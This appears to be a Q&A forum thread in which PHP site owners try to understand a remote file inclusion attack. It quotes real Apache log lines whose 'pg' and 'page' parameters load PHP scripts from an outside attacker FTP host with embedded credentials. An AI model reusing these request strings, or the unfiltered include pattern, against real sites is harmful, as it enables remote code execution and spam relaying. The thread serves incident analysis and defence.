# User create folder in FTP from HTML

Tags: php, ftp

I'm facing a big problem and I can't find the cause. I have a website running in apache in port 80 with ftp access.

Some user is creating FTP folders with malicious commands. I analysed the apache log and found the following strange lines:

```
 [08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai@zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai@zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
```

In my FTP the following folder was created: `/public_html/Cliente`

I have a piece in my code that uses `$_GET['pg']`, see:

```
 $pg = isset($_GET['pg']) ? $_GET['pg'] : null;
 $pg = htmlspecialchars($pg, ENT_QUOTES);
```

I tried test the command `"pg=ftp://zkeliai..."` like hacker did, but nothing happens, and I expected this. I'm very confused in how hacker the created a folder in my FTP.

Comment: Maybe you should have some restriction (user access) for your FTP.

Comment: how does `Thumbr.php` get created? did you create that?

Comment: Also check your `index.php` , is there any extra code in there?

Comment: @CodeGodie, the Thumbr.php is a file inside hacker ftp, and this was created in my ftp too, i didn't create it. The index.php don't have any extra code (malicious) i already checked it.

Comment: @MarcGiroux just 1 user have access to my FTP and i already changed password a lot of time but hacker keep creating files.

Comment: Perhaps through an Anonymous account? read this: https://www.cybrary.it/forums/topic/how-to-crack-an-ftp-server-easy-with-videoimages/

Comment: I would also delete that one FTP user account you have, and recreate a complete other one

Comment: check your FTP logs. What do they say?

Comment: @CodeGodie I'm trying get ftp logs with 'Locaweb', where my site is hosted. About your link "cybrary.it.." , i didn't get login with anonymous.

Comment: @CodeGodie i got the FTP log and there is nothing uploading a "public_html/Cliente" in any day. i Checked also the login and only my user logged in.

Comment: is the "Cliente" folder created by you?

Comment: no, the hacker created that.

Comment: any ideia how to fix this vunerability ?

Comment: Log in to the FTP site using the credentials supplied in the log and view the Thumbr.php file itself to see what it does. I downloaded a copy of that and the showcase.php file from the same directory.

Comment: i think that main problem is discovery how hack put the file in ftp without access.

Answer (score 0):

Without knowing what `$pg` is being used for, it's not really possible to get what the hacker is doing, but it looks like he send a POST request to **index.php** with the parameters

> ?pg=ftp://zkeliai:zkeliai@zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/

The effect of your sanitation with `htmlspecialchars` is to convert the one `&` in the string to `&amp;`. When the request is processed by **index.php**, but, it will be converted back to `&` in an internal string as PHP will assume it was just URL encoded, so when **index.php** is sending its server-side request to **Thumbr.php**, the `&` is present and serves to send parameters to the FTP.

Comment: I think you missed the point. OP wants to know how the hacker is able to use FTP, without an actual FTP user account created by them.

Comment: I can't understand how this can create a folder inside my ftp

Answer (score 0):

We had a similar issue on our university's site. We have over 2200 hits the last few days from this IP with two different .php pages: showcase.php and Thumbr.php

Here's a snippet from our log

> POST /navigator/index.php page=ftp://zkeliai:zkeliai@zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154

This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.

Without being sure what was posted, it seems loading the ftp page (with the included credentials) into PHP with the $_GET[] managed to execute the content on that page? I'm unclear as to how that may work, but that seems to be what happened.

Comment: very interesting, you have almost the same problem then me. I'm studying what the real cause.

Comment: But i think the main problem is discovery how hacker put files in ftp without access.